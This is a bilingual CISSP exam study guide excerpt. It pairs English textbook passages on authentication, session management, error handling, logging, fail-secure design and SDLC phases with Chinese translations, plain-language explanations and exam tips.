One of the core security tasks facing developers is ensuring that those users are properly authenticated, that they perform only authorized actions, and that their session is securely tracked from start to finish. The level of authentication required by an application should be tied directly to the level of sensitivity of that application. For example, if an application provides a user with access to sensitive information or allows the user to perform business-critical applications, it should require the use of strong multifactor authentication. In most cases, developers should seek to integrate their applications with the organization's existing authentication systems.

It is generally more secure to make use of an existing, hardened authentication system than to try to develop an authentication system for a specific application. If this is not possible, consider using externally developed and validated authentication libraries. Similarly, developers should use established methods for session management. This includes ensuring that any cookies used for web session management be transmitted only over secure, encrypted channels and that the identifiers used in those cookies be long and randomly generated. Session tokens should expire after a specified period of time and require that the user reauthenticate.

Error Handling Developers love detailed error messages. The in-depth information returned in those errors is crucial to debugging code and makes it easier for technical staff to diagnose problems experienced by users.

中文直译 / 整理

因此很容易被绕过。 在大多数组织中,安全专业人员通常具有系统管理背景,而缺乏软件 开发的专业经验。 如果您的背景不包含此类经验,也不要因此阻碍您学习 相关知识,并向组织的开发人员普及安全编码的重要性。 身份验证与会话管理 许多应用程序,尤其是Web应用程序,要求用户在访问敏 感信息或修改应用程序中的数据之前进行身份验证。 开发人员面临的核心安全 任务之一是确保这些用户得到正确身份验证,仅执行授权操作,并从始至终安 全地跟踪其会话。 应用程序所需的身份验证级别应直接与其敏感程度相关。 例如,如果某个应用 程序向用户提供访问敏感信息的权限,或允许用户执行关键业务操作,则应要 求使用强多重身份验证。 在大多数情况下,开发人员应设法将应用程序与组织现有的身份验证系统集成。 通常,使用现有且经过加固的身份验证系统比为特定应用程序开发新的身份验 证系统更为安全。 如果无法实现这一点,可考虑使用外部开发并经过验证的身 份验证库。 同样,开发人员应使用经过验证的会话管理方法。 这包括确保用于网页会话管 理的任何 Cookie 仅通过安全的加密通道传输,并且这些 Cookie 中使用的标 识符应足够长且随机生成。

会话令牌应在指定时间后过期,并要求用户重新身 份验证。 错误处理开发人员喜欢详细的错误信息。 这些错误中返回的深入信息对于调试 代码至关重要,并使技术人员更容易诊断用户遇到的问题。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
学习单元 11 / PDF P1334

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

However, those error messages may also expose sensitive internal information to attackers, including the structure of database tables, the addresses of internal servers, and other data that may be useful in reconnaissance efforts that precede an attack. Therefore, developers should disable detailed error messages (also known as debugging mode) on any servers and applications that are publicly accessible. Logging While user-facing detailed error messages may present a security threat, the information that those messages contain is quite useful, not only to developers but also to cybersecurity analysts.

Therefore, applications should be configured to send detailed logging of errors and other security events to a centralized log repository.

The Open Worldwide Application Security Project (OWASP) Secure Coding Practices suggest logging the following events: Input validation failures Authentication attempts, especially failures Access control failures Tampering events, including unexpected changes to state data Attempts to connect with invalid or expired session tokens All system exceptions All administrative functions, including changes to the security configuration settings All backend TLS connection failures Cryptographic module failures This information can be useful in diagnosing security issues and in the investigation of security incidents.

Fail-Secure and Fail-Open In spite of the best efforts of programmers, product designers, and project managers, developed applications will be used in unexpected ways. Some of these conditions will cause failures. Since failures are unpredictable, programmers should design into their code a general sense of how to respond to and handle failures. There are two basic choices when planning for system failure:

中文直译 / 整理

然而,这些错误信息也可能向攻击者暴露敏感的内部信息,包括数据库表的 结构、内部服务器的地址以及其他可能在攻击前的侦察活动中派上用场的数 据。 因此,开发人员应禁用任何公开可访问的服务器和应用程序中的详细错 误信息(也称为调试模式)。 日志记录 尽管面向用户的详细错误消息可能带来安全威胁,但这些消息所包含 的信息对开发人员和网络安全分析师都非常有用。 因此,应用程序应配置为将 错误和其他安全事件的详细日志发送到集中式日志存储库。 开放网络应用安全项目(OWASP)安全编码实践建议记录以下事件: 输入验证失败 身份验证尝试,尤其是失败的尝试 访问控制失败 篡改事件,包括对状态数据的意外更改 尝试使用无效或过期的会话令牌进行连接 所有系统异常 所有管理功能,包括安全配置的更改 配置设置 所有后端 TLS 连接失败 加密模块故障 这些信息在诊断安全问题和调查安全事件时可能很有用。 故障安全与故障开放 尽管程序员、产品设计师和项目经理做出了最大努力,开 发的应用程序仍可能以意想不到的方式被使用。 其中一些情况会导致故障。 由 于故障是不可预测的,程序员应在代码中设计出应对和处理故障的一般机制。 在规划系统故障时,有两种基本选择:

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 12 / PDF P1335

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

The fail-secure failure state puts the system into a high level of security (and possibly even disables it entirely) until an administrator can diagnose the problem and restore the system to normal operation. The fail-open state allows users to bypass failed security controls, erring on the side of permissiveness. In the vast majority of environments, fail-secure is the appropriate failure state because it prevents unauthorized access to information and resources. Software should revert to a fail-secure condition. This may mean closing just the application or possibly stopping the operation of the entire host system.

An example of such failure response is seen in the Windows operating system with the appearance of the infamous Blue Screen of Death (BSOD), indicating the occurrence of a STOP error. A STOP error occurs when an undesirable activity occurs in spite of the OS's efforts to prevent it. This could include an application gaining direct access to hardware, an attempt to bypass a security access check, or one process interfering with the memory space of another. Once one of these conditions occurs, the environment is no longer trustworthy. So, rather than continuing to support an unreliable and insecure operating environment, the OS initiates a STOP error as its failsecure response.

Once a fail-secure operation occurs, the programmer should consider the activities that occur afterward. The options are to remain in a fail-secure state or to automatically reboot the system. The former option requires an administrator to manually reboot the system and oversee the process. This action can be enforced by using a boot password. The latter option does not require human intervention for the system to restore itself to a functioning state, but it has its own unique issues. For example, it must restrict the system to reboot into a nonprivileged state.

In other words, the system should not reboot and perform an automatic logon; instead, it should prompt the user for authorized access credentials.

中文直译 / 整理

安全失败状态会将系统置于高水平的安全状态(甚至可能完全禁用),直 到管理员诊断问题并将系统恢复到正常运行状态。 故障开放状态允许用户绕过失败的安全控制,倾向于更宽松的处理方式。 在绝大多数环境中,故障安全是合适的故障状态,因为它可以防止未经授权访问 信息和资源。 软件应恢复到故障安全状态。 这可能意味着仅关闭应用程序,或可能停止整个 主机系统的运行。 此类故障响应的一个示例出现在Windows操作系统中,即 著名的蓝屏死机(BSOD),表明发生了STOP错误。 当操作系统虽尽力防范但 仍发生不良行为时,就会出现STOP错误。 这可能包括应用程序直接访问硬件、 试图绕过安全访问检查,或一个进程干扰另一个进程的内存空间。 一旦发生上 述任何一种情况,环境就不再可信。 因此,与其继续支持不可靠且不安全的操 作环境,操作系统会通过触发STOP错误作为其故障安全响应。 一旦发生故障安全操作,程序员应考虑随后发生的操作。 选项包括保持在故障 安全状态或自动重启系统。 前者需要管理员手动重启系统并监督整个过程。 此 操作可通过使用启动密码来强制执行。 后者无需人工干预即可使系统恢复到正 常状态,但其自身也存在独特问题。

例如,系统必须限制仅重启到非特权状态。 换句话说,系统不应重启后自动登录; 而应提示用户提供经过授权的访问凭证。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 13 / PDF P1336

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

In limited circumstances, it may be possible to implement a fail-open failure state. This is sometimes appropriate for lower-layer components of a multilayered security system. Fail-open systems should be used with extreme caution. Before deploying a system using this failure mode, clearly validate the business requirement for this move. If it is justified, ensure that adequate alternative controls are in place to protect the organization's resources should the system fail. It's extremely rare that you'd want all your security controls to use a fail-open approach.

Even when security is properly designed and embedded in software, that security is often disabled in order to support easier installation. Thus, it is common for the IT administrator to have the responsibility of turning on and configuring security to match the needs of their specific environment. Maintaining security is often a trade-off with user-friendliness and functionality, as you can see in Figure 20.2. Additionally, as you add or increase security, you will also increase costs, increase administrative overhead, and reduce productivity/throughput. FIGURE 20.2 Security vs. user-friendliness vs. functionality

中文直译 / 整理

在有限的情况下,可能可以实现故障开放状态。 这有时适用于多层次安 全系统的底层组件。 故障开放系统应极其谨慎地使用。 在部署采用此故障模 式的系统之前,必须明确验证此决策的业务需求。 如果理由充分,应确保已 部署足够的替代控制措施,以在系统失效时保护组织的资源。 几乎不可能希 望所有安全控制都采用故障开放方式。 即使安全机制被正确设计并嵌入软件中,为了便于安装,这些安全功能通常也 会被禁用。 因此,IT管理员通常负责开启并配置安全设置,以适应其特定环境 的需求。 维护安全通常需要在用户友好性和功能性之间做出权衡,如图 20.2所 示。 此外,随着您增加或加强安全措施,成本、管理开销以及生产率/吞吐量也 会相应增加和降低。 图 20.2 安全性与用户友好性 vs. 功能性

小白解释

场景先行:你是公司的安全负责人,正在读第 1336 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
学习单元 14 / PDF P1337

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Systems Development Life Cycle Security is most effective if it is planned and managed throughout the life cycle of a system or application. Administrators employ project management to keep a development project on target and moving toward the goal of a completed product. Often project management is structured using life cycle models to direct the development process. Using formalized life cycle models helps ensure good coding practices and the embedding of security in every stage of product development. All systems development processes should have several activities in common.

Although they may not necessarily share the same names, these core activities are essential to the development of sound, secure systems: Conceptual definition Functional requirements determination Control specifications development Design review Coding Code review walk-through System test review Maintenance and change management The section “Life Cycle Models,” later in this chapter, examines two life cycle models and shows how these activities are applied in real-world software engineering environments. At this point, the terminology used in systems development life cycles varies from model to model and from publication to publication.

Don't spend too much time worrying about the exact terms used in this book or any of the other literature you may come across. When you take the CISSP examination, it's much more important that you have an understanding of how the process works and of the fundamental principles underlying the development of secure systems.

中文直译 / 整理

系统开发生命周期 如果在系统或应用程序的整个生命周期中规划和管理安全,其效果将最为显著。 管理员通过项目管理确保开发项目按计划推进,朝着完成产品的目标前进。 通 常,项目管理采用生命周期模型来指导开发过程。 使用标准化的生命周期模型 有助于确保良好的编码实践,并在产品开发的每个阶段都嵌入安全机制。 所有系统开发过程都应包含若干共同活动。 尽管这些活动的名称可能不尽相同, 但它们对于开发健全、安全的系统至关重要: 概念定义 功能需求确定 控制规范开发 设计评审 编码 代码审查 walkthrough 系统测试审查 维护与变更管理 本章后面部分的“生命周期模型”一节将考察两种生命周期模型,并展示这些 活动如何在现实世界的软件工程环境中应用。 在这一阶段,系统开发生命周期中使用的术语因模型和出版物而异。 不必花太多时间纠结于本书或你可能遇到的其他文献中使用的精确术语。 当你参加CISSP考试时,更重要的是理解该过程的工作方式以及开发安全 系统所依据的基本原则。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 15 / PDF P1338

章末总结与练习题

章末内容用来反查自己是否真的理解,而不是只背答案。

教材原文段落

Conceptual Definition The conceptual definition phase of systems development involves creating the basic concept statement for a system. It's a simple statement agreed on by all interested stakeholders (the developers, customers, and management) that states the purpose of the project as well as the general system requirements. The conceptual definition is a very high-level statement of purpose and should not be longer than one or two paragraphs. If you were reading a detailed summary of the project, you might expect to see the concept statement as an abstract or introduction that enables an outsider to gain a top-level understanding of the project in a short period of time.

The security requirements developed at this phase are generally very high level. They will be refined during the control specifications development phase. At this point in the process, designers commonly identify the classification(s) of data that will be processed by the system and the applicable handling requirements. It's helpful to refer to the concept statement at all phases of the systems development process. Often, the intricate details of the development process tend to obscure the overarching goal of the project. Simply reading the concept statement periodically can assist in refocusing a team of developers.

Functional Requirements Determination Once all stakeholders have agreed on the concept statement, it's time for the development team to sit down and begin the functional requirements process. In this phase, specific system functionalities are listed, and developers begin to think about how the parts of the system should interoperate to meet the functional requirements. The deliverable from this phase of development is a functional requirements document that lists the specific system requirements. These requirements should be expressed in a form consumable by software developers.

The following are the three major characteristics of a functional requirement: Input(s) The data provided to a function Behavior The business logic describing what actions the system should take in response to different inputs Output(s) The data provided from a function As with the concept statement, it's important to ensure that all stakeholders agree on the functional requirements document before work progresses to

中文直译 / 整理

概念定义 系统开发的概念定义阶段涉及为系统创建基本概念陈述。 这是一个由所有相关 利益相关者(开发人员、客户和管理层)共同达成的简单陈述,说明了项目的 目的以及一般系统需求。 概念定义是对目的的高度概括性陈述,长度不应超过 一两段。 如果你正在阅读项目的详细摘要,你可能会期望看到这个概念陈述作 为摘要或引言,使外部人员能够在短时间内获得对项目的高层级理解。 在此阶段制定的安全需求通常非常笼统。 它们将在控制规范开发阶段进一 步细化。 在此阶段,设计人员通常会识别系统将处理的数据分类及其适用 的处理要求。 在系统开发过程的所有阶段参考概念声明都非常有帮助。 通常,开发过程中的 复杂细节会掩盖项目的总体目标。 定期阅读概念声明有助于帮助开发团队重新 聚焦。 功能需求确定 一旦所有利益相关者就概念声明达成一致,开发团队就应坐下来开始功能需求 流程。 在此阶段,列出具体系统功能,开发人员开始思考系统各部分应如何协 同工作以满足功能需求。 此开发阶段的交付成果是一个功能需求文档,其中列 出了具体的系统需求。 这些需求应以软件开发人员可使用的格式表达。

以下是 功能需求的三个主要特征: 输入 提供给函数的数据 行为 描述系统应如何根据不同输入采取行动的业务逻辑 输出 由函数提供的数据 与概念陈述一样,在工作进展到下一阶段之前,确保所有利益相关者对功能需求 文档达成一致至关重要。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:章末内容用来反查自己是否真的理解,而不是只背答案。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

数据分类:数据分类按敏感度和价值给数据贴等级,决定保护强度。

日志:日志记录系统和用户活动,用于监控、审计和调查。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“章末总结与练习题”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

分类由数据所有者决定,保护由保管者实施。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
数据分类 数据分类按敏感度和价值给数据贴等级,决定保护强度。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 16 / PDF P1339

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

the next level. When it's finally completed, the document shouldn't be simply placed on a shelf to gather dust—the entire development team should constantly refer to this document during all phases to ensure that the project is on track. In the final stages of testing and evaluation, the project managers should use this document as a checklist to ensure that all functional requirements are met. Control Specifications Development Security-conscious organizations also ensure that adequate security controls are designed into every system from the earliest stages of development. It's often useful to have a control specifications development phase in your life cycle model.

This phase takes place soon after the development of functional requirements and often continues as the design and design review phases progress. During the development of control specifications, you should analyze the system from a number of security perspectives. First, adequate access controls must be designed into every system to ensure that only authorized users are allowed to access the system and that they are not permitted to exceed their level of authorization. Second, the system must maintain the confidentiality of vital data through the use of appropriate encryption and data protection technologies.

Next, the system should provide both an audit trail to enforce individual accountability and a detection mechanism for illegitimate activity. Finally, depending on the criticality of the system, availability and fault-tolerance issues should be addressed as corrective actions. Keep in mind that designing security into a system is not a onetime process and it must be done proactively. All too often, systems are designed without security planning, and then developers attempt to retrofit the system with appropriate security mechanisms. Unfortunately, these mechanisms are an afterthought and do not fully integrate with the system's design, which leaves gaping security vulnerabilities.

Also, the security requirements should be revisited each time a significant change is made to the design specifications. If a major component of the system changes, it's likely that the security requirements will change as well. Design Review Once the functional and control specifications are complete, let the system designers do their thing. In this often-lengthy process, the designers

中文直译 / 整理

当文档最终完成时,不应仅仅将其搁置一旁积灰——整个开发团队应在所有阶 段持续参考此文档,以确保项目按计划进行。 在测试和评估的最后阶段,项目 经理应使用此文档作为检查清单,以确保所有功能需求均已满足。 控制规范开发 具有安全意识的组织还会确保在系统开发的最早阶段就将充分的安全控制措施 融入其中。 在您的生命周期模型中,通常设置一个控制规范开发阶段会非常有 用。 该阶段紧随功能需求的制定之后进行,并通常在设计和设计评审阶段持续 进行。 在控制规范的开发过程中,您应从多个安全角度分析系统。 首先,必须在每 个系统中设计充分的访问控制,以确保只有授权用户才能访问系统,且不允 许其超越其授权级别。 其次,系统必须通过使用适当的加密和数据保护技术 来保障关键数据的机密性。 接下来,系统应提供审计跟踪以实现个人问责制, 并具备检测非法活动的机制。 最后,根据系统的关键性,应将可用性和容错 性问题作为纠正措施予以解决。 请牢记,将安全性融入系统并非一次性过程,而必须主动进行。 很多时候,系 统在设计时未考虑安全规划,随后开发人员才试图为系统添加适当的安全机制。

不幸的是,这些机制往往是事后才考虑的,无法与系统设计完全整合,从而留 下严重的安全漏洞。 此外,每次对设计规范进行重大更改时,都应重新审视安 全需求。 如果系统的主要组件发生变化,安全需求很可能也随之改变。 设计评审 一旦功能和控制规范完成,就让系统设计师开展他们的工作。 在这个常常耗时较 长的过程中,设计师

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

问责依赖识别、认证、授权、审计和记账共同工作。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
问责性 问责性要求能把行为绑定到具体主体。
加密 加密把内容变成未授权者看不懂的形式。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 17 / PDF P1340

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

determine exactly how the various parts of the system will interoperate and how the modular system structure will be laid out. Also, during this phase the design management team commonly sets specific tasks for various teams and lays out initial timelines for the completion of coding milestones. After the design team completes the formal design documents, a review meeting with the stakeholders should be held to ensure that everyone is in agreement that the process is still on track for the successful development of a system with the desired functionality.

This design review meeting should include security professionals who can validate that the proposed design meets the control specifications developed in the previous phase. Coding Once the stakeholders have given the software design their blessing, it's time for the software developers to start writing code. Developers should use the secure software coding principles discussed in this chapter to craft code that is consistent with the agreed-on design and meets user requirements. Code Review Walk-Through Project managers should schedule several code review walk-through meetings at various milestones throughout the coding process.

These technical meetings usually involve only development personnel, who sit down with a copy of the code for a specific module and walk through it, looking for problems in logical flow or other design/security flaws. The meetings play an instrumental role in ensuring that the code produced by the various development teams performs according to specification. System Test Review After many code reviews and a lot of long nights, there will come a point at which a developer puts in that final semicolon and declares the system complete. As any seasoned software engineer knows, the system is never complete.

Initially, most organizations perform the initial system testing using development personnel to seek out any obvious errors. As the testing progresses, developers and actual users validate the system against predefined scenarios that model common and unusual user activities. In cases where the project is releasing updates to an existing system, regression testing formalizes the process of verifying that the new code performs in the same manner as the old code, other than any changes expected as part of the new release. These testing procedures should include both functional testing

中文直译 / 整理

将明确系统各个部分如何协同工作,以及模块化系统结构将如何布局。 此外, 在此阶段,设计管理团队通常会为各个团队分配具体任务,并制定编码里程碑 的初步时间表。 设计团队完成正式设计文档后,应召开利益相关方评审会议,以确保各方一致 认同该过程仍按计划推进,以成功开发出具有所需功能的系统。 此次设计评审 会议应包括安全专业人员,他们可以验证所提出的设计是否符合前一阶段制定 的控制规范。 编码 一旦利益相关方对软件设计表示认可,软件开发人员就应开始编写代码。 开发 人员应使用本章讨论的安全软件编码原则,编写与既定设计一致并满足用户需 求的代码。 代码审查走查 项目经理应在编码过程的各个里程碑处安排多次代码审查走查会议。 这些技术 会议通常仅涉及开发人员,他们将坐在一起,针对特定模块的代码进行逐行审 查,查找逻辑流程或其他设计/安全缺陷。 这些会议对于确保各开发团队编写的 代码符合规范起着关键作用。 系统测试审查 经过多次代码审查和无数个漫长的夜晚,开发人员最终会输入最后一个分号, 并宣布系统完成。 正如任何经验丰富的软件工程师所知,系统永远未完成。 最 初,大多数组织会使用开发人员进行初始的 系统测试,以发现任何明显的错误。

随着测试的进行,开发人员和实际用户会根据预定义的场景验证系统,这些场 景模拟了常见和异常的用户行为。 在项目向现有系统发布更新的情况下,回归 测试将验证新代码是否与旧代码表现一致,除了新版本中预期的更改之外。 这 些测试程序应包括功能测试

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

程序:程序是一步一步怎么做。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

